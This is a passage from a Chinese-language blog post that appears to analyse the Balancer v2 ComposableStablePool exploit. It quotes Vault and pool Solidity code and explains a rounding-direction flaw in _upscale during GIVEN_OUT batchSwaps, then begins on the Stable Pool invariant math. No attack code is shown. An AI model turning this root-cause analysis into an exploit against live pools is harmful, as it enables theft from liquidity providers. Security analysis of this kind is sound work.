poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">            lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? <span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsOut are amounts exiting the Pool, so we round down.</span></span><br><span class="line">        <span class="title function_">_downscaleDownArray</span>(amountsOut, scalingFactors);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note we no longer use `balances` after calling `_onExitPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">    <span class="title function_">_burnPoolTokens</span>(sender, bptAmountIn);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">    <span class="keyword">return</span> (amountsOut, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>Swap 操作</strong></p><p>在 Balancer 中，用户可以通过 <code>swap</code> 与 <code>batchSwap</code> 与 Vault 进行代币交换，而无需直接信任 Pool 合约本身，因为所有安全检查均由 Vault 完成。<code>swap</code> 用于执行一次单独的代币兑换，<code>batchSwap</code> 则可在同一笔交易中按顺序执行多次兑换，并支持 multihop 形式的链式交换。</p><p>每次 swap 都包含一个 tokenIn 与一个 tokenOut：前者由用户发送给 Pool，后者由 Pool 发给接收方。根据用户的意图不同，swap 分为两类：</p><ul><li><strong>GIVEN_IN</strong>：输入数量固定，由 Pool 通过 <code>onSwap</code> 钩子计算输出数量</li><li><strong>GIVEN_OUT</strong>：输出数量固定，也是由 Pool 通过 <code>onSwap</code> 钩子计算输出数量</li></ul><blockquote><p>注意：在 batchSwap 里，虽然会涉及到多个 swap 操作，但是这些 swap 操作都共用一种类型，即要么这些 swap 全是 GIVEN_IN 类型，要么全是 GIVEN_OUT 类型。这个 SwapKind 是用户在调用 batchSwap 通过函数调用参数指定的，因此不会出现一笔 batchSwap 里不同 swap 的 Kind 混着计算的情况。</p></blockquote><p>无论进行多少次交换，Vault 都会先完成所有中间计算，并在最后一步一次性结算代币的净变动，从而显著节省 gas，尤其是在 multihop 或跨多个 Pool 交换时。</p><blockquote><p>在 multihop 进行多次代币转换时（例如先 TokenA/TokenB swap，再 TokenB/TokenC 转换），可以在后续 swap 时设置 tokenIn amount 为 0，这将使用上一步 swap 所流出的 token 数量，以简化计算逻辑，也就是不需要用户去算每一次 swap 的数量。</p></blockquote><p><strong>注意：用户有义务根据 SwapKind 来维护正确的 Swap 顺序</strong>。例如，假设有 TokenA/TokenB 和 TokenB/TokenC 两对 swap，如果用户希望</p><ol><li>用 100 TokenA 来 swap 出 TokenC，则需设置<ul><li>SwapKind 为 <strong>GIVEN_IN</strong></li><li>SwapSteps 为  <code>100 TokenA/TokenB -&gt; 0 TokenB/TokenC</code>。表示将 100 Token A 用于兑换 TokenB，并将<strong>全部</strong>兑换到的 TokenB 用来兑换 TokenC （第二步 TokenB/TokenC 的 swap 操作 amount 被设置为 0 以表示使用上一步的兑换结果数额）。</li></ul></li><li>需要用 TokenA 来 swap 出 100 TokenC，则需要设置<ul><li>SwapKind 为 <strong>GIVEN_OUT</strong></li><li>SwapSteps 为  <code>100 TokenB/TokenC -&gt; 0 TokenA/TokenB</code>。表示倒推如果需要 100 个 TokenC，则需要提供多少个 TokenB，然后把所计算出所需的 TokenB 的数量再用于倒推需要提供多少个 TokenA。</li></ul></li></ol><p>由于 batchSwap 需要支持两种 swap，因此 <strong>pool 需要分别为这两种方向的 swap 实现有利于协议的份额计算方式</strong>，其函数调用路径为：<code>batchSwap → _swapWithPools → _swapWithPool → _processGeneralPoolSwapRequest → BaseGeneralPool.onSwap → BaseGeneralPool._swapGivenIn/_swapGivenOut → 具体各个 pool 所实现的 _swapGivenIn/_swapGivenOut hook 函数</code>。其中 <code>BaseGeneralPool._swapGivenIn/_swapGivenOut</code> 这俩函数是可以被 override 的，ComposableStablePool 就是把这俩 <code>_swapGivenIn/_swapGivenOut</code> 函数给 override 掉用来单独特判 BPT 的 swap 逻辑。</p><p>提一嘴，对于 ComposableStablePool 这种 GeneralPool 来说，vault 在处理 swap 时所操作的 pool 余额就是我们之前已经介绍过的 _generalPoolsBalances 状态变量，可以从这里快速看出它是怎么记账的：</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/Swaps.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_processGeneralPoolSwapRequest</span>(<span class="params">IPoolSwapStructs.SwapRequest memory request, IGeneralPool pool</span>)</span><br><span class="line">    private</span><br><span class="line">    <span class="title function_">returns</span> (uint256 amountCalculated)</span><br><span class="line">&#123;</span><br><span class="line">    bytes32 tokenInBalance;</span><br><span class="line">    bytes32 tokenOutBalance;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We access both token indexes without checking existence, because we will do it manually immediately after.</span></span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[request.<span class="property">poolId</span>];</span><br><span class="line">    uint256 indexIn = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenIn</span>);</span><br><span class="line">    uint256 indexOut = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenOut</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (indexIn == <span class="number">0</span> || indexOut == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// The tokens might not be registered because the Pool itself is not registered. We check this to provide a</span></span><br><span class="line">        <span class="comment">// more accurate revert reason.</span></span><br><span class="line">        <span class="title function_">_ensureRegisteredPool</span>(request.<span class="property">poolId</span>);</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">TOKEN_NOT_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// EnumerableMap stores indices *plus one* to use the zero index as a sentinel value - because these are valid,</span></span><br><span class="line">    <span class="comment">// we can undo this.</span></span><br><span class="line">    indexIn -= <span class="number">1</span>;</span><br><span class="line">    indexOut -= <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    uint256 tokenAmount = poolBalances.<span class="title function_">length</span>();</span><br><span class="line">    uint256[] memory currentBalances = <span class="keyword">new</span> uint256[](tokenAmount);</span><br><span class="line"></span><br><span class="line">    request.<span class="property">lastChangeBlock</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokenAmount; i++) &#123;</span><br><span class="line">        <span class="comment">// Because the iteration is bounded by `tokenAmount`, and no tokens are registered or deregistered here, we</span></span><br><span class="line">        <span class="comment">// know `i` is a valid token index and can use `unchecked_valueAt` to save storage reads.</span></span><br><span class="line">        bytes32 balance = poolBalances.<span class="title function_">unchecked_valueAt</span>(i);</span><br><span class="line"></span><br><span class="line">        currentBalances[i] = balance.<span class="title function_">total</span>();</span><br><span class="line">        request.<span class="property">lastChangeBlock</span> = <span class="title class_">Math</span>.<span class="title function_">max</span>(request.<span class="property">lastChangeBlock</span>, balance.<span class="title function_">lastChangeBlock</span>());</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (i == indexIn) &#123;</span><br><span class="line">            tokenInBalance = balance;</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (i == indexOut) &#123;</span><br><span class="line">            tokenOutBalance = balance;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Perform the swap request callback and compute the new balances for &#x27;token in&#x27; and &#x27;token out&#x27; after the swap</span></span><br><span class="line">    amountCalculated = pool.<span class="title function_">onSwap</span>(request, currentBalances, indexIn, indexOut);</span><br><span class="line">    (uint256 amountIn, uint256 amountOut) = <span class="title function_">_getAmounts</span>(request.<span class="property">kind</span>, request.<span class="property">amount</span>, amountCalculated);</span><br><span class="line">    tokenInBalance = tokenInBalance.<span class="title function_">increaseCash</span>(amountIn);</span><br><span class="line">    tokenOutBalance = tokenOutBalance.<span class="title function_">decreaseCash</span>(amountOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Because no tokens were registered or deregistered between now or when we retrieved the indexes for</span></span><br><span class="line">    <span class="comment">// &#x27;token in&#x27; and &#x27;token out&#x27;, we can use `unchecked_setAt` to save storage reads.</span></span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexIn, tokenInBalance);</span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexOut, tokenOutBalance);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="三、漏洞分析">三、漏洞分析</h2><p>我们来看一下这个漏洞是怎么触发的。首先我们需要 clone <a href="https://github.com/balancer/balancer-v2-monorepo">balancer/balancer-v2-monorepo</a> 的仓库，并 checkout commit 为 88842344fb5f44d8ed6f8f944acd3be80627df87。</p><blockquote><p>注意 balancer 的最新版本为 v3，因此 github 里还有一个 v3 的仓库，但漏洞出现的地方是在 <strong>v2</strong> 版本，不要弄错。以及此 commit 为截至 2025/11/20 的最新 commit，在攻击事件发生两周之后漏洞补丁仍然没有被 push 上来。</p></blockquote><h3 id="1-漏洞代码">1. 漏洞代码</h3><p>上一节里我们详细描述了 balancer 的交互流程，对一些操作和变量已经有了比较清晰的认知，因此理解起来这个漏洞就不再困难。这个漏洞其实很简单，当用户指定 SwapKind.GIVEN_OUT 调用 vault.batchSwap 时，如果 swap 涉及到 ComposableStablePool 且 tokenIn/tokenOut 不为 BPT，则实际会调用基类 <code>BaseGeneralPool._swapGivenOut</code> 来计算所需 tokenIn 的数额：</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Override this hook called by the base class `onSwap`, to check whether we are doing a regular swap,</span></span><br><span class="line"><span class="comment"> * or a swap involving BPT, which is equivalent to a single token join or exit. Since one of the Pool&#x27;s</span></span><br><span class="line"><span class="comment"> * tokens is the preminted BPT, we need to handle swaps where BPT is involved separately.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * At this point, the balances are unscaled. The indices and balances are coming from the Vault, so they</span></span><br><span class="line"><span class="comment"> * refer to the full set of registered tokens (including BPT).</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * If this is a swap involving BPT, call `_swapWithBpt`, which computes the amountOut using the swapFeePercentage</span></span><br><span class="line"><span class="comment"> * and charges protocol fees, in the same manner as single token join/exits. Otherwise, perform the default</span></span><br><span class="line"><span class="comment"> * processing for a regular swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line">        (swapRequest.<span class="property">tokenIn</span> == <span class="title class_">IERC20</span>(<span class="variable language_">this</span>) || swapRequest.<span class="property">tokenOut</span> == <span class="title class_">IERC20</span>(<span class="variable language_">this</span>))</span><br><span class="line">            ? <span class="title function_">_swapWithBpt</span>(swapRequest, registeredBalances, registeredIndexIn, registeredIndexOut, scalingFactors)</span><br><span class="line">            : <span class="variable language_">super</span>.<span class="title function_">_swapGivenOut</span>( <span class="comment">// &lt;------ [1]</span></span><br><span class="line">                swapRequest,</span><br><span class="line">                registeredBalances,</span><br><span class="line">                registeredIndexIn,</span><br><span class="line">                registeredIndexOut,</span><br><span class="line">                scalingFactors</span><br><span class="line">            );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/BaseGeneralPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 indexIn,</span></span><br><span class="line"><span class="params">    uint256 indexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">    swapRequest.<span class="property">amount</span> = <span class="title function_">_upscale</span>(swapRequest.<span class="property">amount</span>, scalingFactors[indexOut]); <span class="comment">// &lt;---- [2]</span></span><br><span class="line"></span><br><span class="line">    uint256 amountIn = <span class="title function_">_onSwapGivenOut</span>(swapRequest, balances, indexIn, indexOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// amountIn tokens are entering the Pool, so we round up.</span></span><br><span class="line">    amountIn = <span class="title function_">_downscaleUp</span>(amountIn, scalingFactors[indexIn]);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Fees are added after scaling happens, to reduce the complexity of the rounding direction analysis.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">_addSwapFeeAmount</span>(amountIn);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/solidity-utils/contracts/helpers/ScalingHelpers.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Applies `scalingFactor` to `amount`, resulting in a larger or equal value depending on whether it needed</span></span><br><span class="line"><span class="comment"> * scaling or not.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_upscale</span>(<span class="params">uint256 amount, uint256 scalingFactor</span>) pure <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Upscale rounding wouldn&#x27;t necessarily always go in the same direction: in a swap for example the balance of</span></span><br><span class="line">    <span class="comment">// token in should be rounded up, and that of token out rounded down. This is the only place where we round in</span></span><br><span class="line">    <span class="comment">// the same direction for all amounts, as the impact of this rounding is expected to be minimal.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="title function_">mulDown</span>(amount, scalingFactor); <span class="comment">// &lt;----- [3]</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>从代码中可以看到，哪怕是为 GivenOut 计算所需 tokenIn 的 amount ，BaseGeneralPool._swapGivenOut 依然会用 mulDown 来进行 upscale。<strong>然而在 GivenOut 的上下文下，mulDown 是偏向于用户而非偏向于协议的</strong>，因为 swapRequest.amount 此时表示用户需要多少个 tokenOut，如果 _upscale 计算出来的 <strong>token 价值</strong>被设置少了，那么可能就无法确保用户支付的价值足够多。</p><blockquote><p>例如对于 TokenB/TokenC swap 此时 amount =100 表示用户需要100个 tokenC，以此来计算 pool 需要用户提供多少个 TokenB，如果 amount 被减小了，那么自然计算出来的需要从用户那边转账进 vault 的 tokenA 的数量就会跟着变小。</p></blockquote><p><strong>这里就是漏洞的实际关键代码。</strong> 不过从注释里看出开发者确信这里能造成的影响微乎其微（<em>the impact of this rounding is expected to be minimal</em>），那是什么导致本应该微乎其微的影响竟能产生如此大的代币窃取呢？这里需要仔细分析几个关键点。首先我们来捋一捋 scalingFactor 的计算过程。</p><p>在 ComposableStablePool 中，所计算的 scalingFactor 将会等于该 token 当前 decimal <strong>乘以 token rate</strong>，这将导致最终计算出来的结果将为在 1e18 精度下的小数，并在 _upscale 中的 FixedPoint.mulDown 里最后一步将 1e18 精度除掉。</p><blockquote><p>例如，假如 _scalingFactor0 为 1e18，tokenRate0 为 1.1e18，那么 _scalingFactors 函数计算出来的结果将为 1.1e18。<br>接下来以极小值作为 amount 参数调用 _upscale 函数，例如执行 _upscale(<strong>9</strong>, 1.1e18) ，则最终计算出来的结果将为 <code>9.9e18 % 1e18 = 9</code>，可以看到这里的计算丢失了 0.9 的精度，相当于是 10% 的精度损失。</p></blockquote><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePoolRates.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Overrides scaling factor getter to compute the tokens&#x27; rates.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactors</span>(<span class="params"></span>) internal view virtual override <span class="title function_">returns</span> (uint256[] memory) &#123;</span><br><span class="line">    <span class="comment">// There is no need to check the arrays length since both are based on `_getTotalTokens`</span></span><br><span class="line">    uint256 totalTokens = <span class="title function_">_getTotalTokens</span>();</span><br><span class="line">    uint256[] memory scalingFactors = <span class="keyword">new</span> uint256[](totalTokens);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; totalTokens; ++i) &#123;</span><br><span class="line">        scalingFactors[i] = <span class="title function_">_getScalingFactor</span>(i).<span class="title function_">mulDown</span>(<span class="title function_">_getTokenRate</span>(i)); <span class="comment">// &lt;---</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> scalingFactors;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但只分析到这并不够，攻击事件的核心问题并不在这。首先<strong>虽然 _upscale 的 amount 参数为 9 这种极小值时确实可以看到明显的精度丢失，但 9 这个极小值的逻辑意义就是 9 wei</strong>。要是攻击者进行一次 swap 就只窃取 1 wei 走，那这点钱可不够支付单次 swap 的 gas 费，这可能也正是 _upscale 开发者确信影响微乎其微的原因。其次，_scalingFactors 计算过程中乘以 tokenRate 的逻辑也没有问题，因为 Linear Pool 里有类似的逻辑，但 Linear Pool 却不在本次攻击范围内：</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-linear/contracts/LinearPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactor</span>(<span class="params">IERC20 token</span>) internal view virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">if</span> (token == _mainToken) &#123;</span><br><span class="line">        <span class="keyword">return</span> _scalingFactorMainToken;</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (token == _wrappedToken) &#123;</span><br><span class="line">        <span class="comment">// The wrapped token&#x27;s scaling factor is not constant, but increases over time as the wrapped token</span></span><br><span class="line">        <span class="comment">// increases in value.</span></span><br><span class="line">        <span class="keyword">return</span> _scalingFactorWrappedToken.<span class="title function_">mulDown</span>(<span class="title function_">_getWrappedTokenRate</span>()); <span class="comment">// &lt;--------</span></span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (token == <span class="variable language_">this</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="property">ONE</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">INVALID_TOKEN</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>那问题出在哪？？？是时候来学习一下 Stable Pool 的数学模型了。</strong></p><h3 id="2-Stable-Pool-数学模型">2. Stable Pool 数学模型</h3><blockquote><p>这一节介绍一下 Stable Pool 的数学模型，出于学习的目的会涉及到额外的背景知识，并非所有内容都和漏洞有关。</p></blockquote><p>在 swap 过程中控制流将通过调用链 <code>BaseGeneralPool._swapGivenOut → ComposableStablePool._onSwapGivenOut → ComposableStablePool._onRegularSwap</code> 进入到具体的 swap 份额计算逻辑：</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Perform a swap between non-BPT tokens. Scaling and fee adjustments have been performed upstream, so</span></span><br><span class="line"><span class="comment"> * all we need to do here is calculate the price quote, depending on the direction of the swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_onRegularSwap</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bool isGivenIn,</span></span><br><span class="line"><span class="params">    uint256 amountGiven,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut</span></span><br><span class="line"><span class="params"></span>) private view <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Adjust indices and balances for BPT token</span></span><br><span class="line">    uint256[] memory balances = <span class="title function_">_dropBptItem</span>(registeredBalances);</span><br><span class="line">    uint256 indexIn = <span class="title function_">_skipBptIndex</span>(registeredIndexIn);</span><br><span class="line">    uint256 indexOut = <span class="title function_">_skipBptIndex</span>(registeredIndexOut);</span><br><span class="line"></span><br><span class="line">    (uint256 currentAmp, ) = <span class="title function_">_getAmplificationParameter</span>();</span><br><span class="line">    uint256 invariant = <span class="title class_">StableMath</span>.<span class="title function_">_calculateInvariant</span>(currentAmp, balances);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (isGivenIn) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcOutGivenIn</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title class_">StableMath</span>.<span class="title function_">_calcInGivenOut</span>(currentAmp, balances, indexIn, indexOut, amountGiven, invariant);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>在这里我们可以看到几个用于计算份额的函数：</p><ul><li>_getAmplificationParameter：获取放大系数，这是一个超参，可被管理员通过时间来平滑修改</li><li>_calculateInvariant：计算不变量 D</li><li>_calcOutGivenIn/_calcInGivenOut：根据之前计算出来的不变量 D 以及代币兑换方向来计算出 amountGiven 个 tokenIn 下能兑换出多少个 tokenOut</li></ul><p>对于自动做市商 AMM 而言，它们大体上都需要遵守数学公式 $f(\mathbf{B}^{\text{prev}}; \boldsymbol{\theta})=f(\mathbf{B}^{\text{after}}; \boldsymbol{\theta})=D$，以确保代币兑换价格能够随着交易自动变动。</p><blockquote><p>其中 $\mathbf{B} = (B_1, B_2,…)$ 表示多个 token 的余额（<strong>注意这里的余额是乘以 Token Rate 之后的值</strong>），$\boldsymbol{\theta}=(\theta_1,\theta_2,…)$表示超参（上面的 AmplificationParameter 就属于超参），$D$即公式的不变量，代币余额变动是通过不变量来维持价格稳定。</p></blockquote><p>不同代币对的价格行为和风险特征并不相同，因此不变量函数 f 也需要因市场结构而异。对于 Stable Pool 而言，由于稳定币的兑换关系通常长期维持在固定比例，例如 1:1，自然希望该池在这一价格临界点附近拥有尽可能大的流动性深度，使得即便存在较大规模的成交，也不会引起显著价格波动，从而降低滑点并提升交易体验。但与此同时，当价格明显偏离这一固定比例时，又必须保证价格具备足够的敏感性，使得继续交易的成本迅速上升，以防止某一侧资产被过度抽干，并为套利者提供恢复价格锚定的动力。大概是这种效果：</p><ul><li><p><strong>价格-流动性图</strong>：可以看到价格在 1.0 附近的流动性非常多，因为 stable coin 本身价格的变动就极其轻微；而偏远价格的流动性相对较低。</p><p><img src="/2025/11/balancer-128m-exploit-analysis/price-liquidity.png" alt="price-liquidity.png"></p></li><li><p><strong>TokenA流动性-TokenB流动性图</strong> (50/50 Stable Pool)：大概是途中橙线的效果，在0.5附近的样子接近常和线，在极端情况下的样子接近常积线。</p><blockquote><p>图是用 chatgpt 画出来的，因此此图就是大概让读者看个样子有个预期印象，不能深究数学公式。</p></blockquote><p><img src="/2025/11/balancer-128m-exploit-analysis/reservePrice.png" alt="reservePrice.png"></p></li></ul><p>因此，<strong>Stable Pool 所采用的不变量函数并非单纯的常和模型或常积模型</strong>，而是通过引入放大系数等超参数，在二者之间实现连续过渡：</p><ul><li>在价格接近锚定区间时，其行为更接近常和曲线 x + y = k，从而提供近乎稳定的兑换比率</li><li>随着价格逐渐偏离该区间，不变量函数又逐步向常积曲线 x * y = k 退化，使价格曲线变得更加陡峭，强化系统在极端情况下的安全性与稳健性</li></ul><p><code>_calculateInvariant</code> 函数里维持了这样的不变量公式，其中：</p><p>$$A n^{n} S + D = A D n^{n}+\frac{D^{n+1}}{n^{n} P},\quad S = \sum_{i=1}^{n} x_i,; P = \prod_{i=1}^{n} x_i $$</p><ul><li>A：<strong>放大系数</strong>，超参。</li><li>n：代币<strong>总个数</strong>。</li><li>S：全部代币总余额之<strong>和</strong>。</li><li>P：全部代币总余额之<strong>积</strong>。</li><li>D：上面提到的在代币 swap 时需要维持的<strong>不变量</strong>，<strong>待计算的值</strong>。</li></ul><blockquote><p>注：这里的数学公式与漏洞利用无关，不感兴趣的读者可以跳过。</p></blockquote><p>这样一来，如果：</p><ul><li><strong>池子接近平衡状态</strong>：例如所有余额满足 $x_i \approx \frac{D}{n}$ 时，有$P \approx \left(\frac{D}{n}\right)^n$，此时方程中由 A 放大的项占主导，解趋近于$D \approx S$，从而得到 $x_1 + x_2 + \cdots + x_n \approx 